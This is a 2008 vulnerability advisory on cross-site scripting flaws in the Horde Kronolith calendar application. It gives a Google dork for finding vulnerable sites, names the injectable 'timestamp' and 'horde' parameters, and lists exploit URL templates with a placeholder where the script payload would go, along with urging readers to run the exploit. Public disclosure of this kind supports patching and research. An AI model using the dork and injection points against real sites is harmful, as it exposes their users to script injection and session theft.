The Horde and Kronolith Calendar applications suffer from multiple cross site scripting vulnerabilities.
30386bed5825372b7aefe414a9a8e005c856806f03ed110e291fcb1aa690f057
+==========================================================================+
+ Horde & Kronolith Calendar Application & XSS Vulnerabilities +
+==========================================================================+
Author(s): Ivan Sanchez
Product: Kronolith Calendar Application
Web: http://www.horde.org/kronolith/
Versions: Kronolith: Copyright 2000-2003
Date: 23/05/2008
Kronolith is the Horde calendar application.
GOOGLE DORKS:
------------
intext:"Kronolith: Copyright 2000-2003"
Evil Functions:
---------------
week.php?
workweek.php?
day.php?
horde=
Internal Variables:
-------------------
timestamp=xss
horde=xss
Exploits:
----------
Insert evil code into these variables,then run the exploit !!!
http://site/horde2/kronolith/week.php?timestamp=< XSS EVIL REMOTE CODE >
http://site/horde2/kronolith/workweek.php?timestamp=< XSS EVIL REMOTE CODE >
http://site/horde/kronolith/day.php?timestamp=< XSS EVIL REMOTE CODE >
https://site/horde/kronolith/horde= < XSS EVIL REMOTE CODE >
Comming soon more xss !!!
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==========================================================================+
+ Horde & Kronolith Calendar Application & XSS Vulnerabilities + +
+==========================================================================+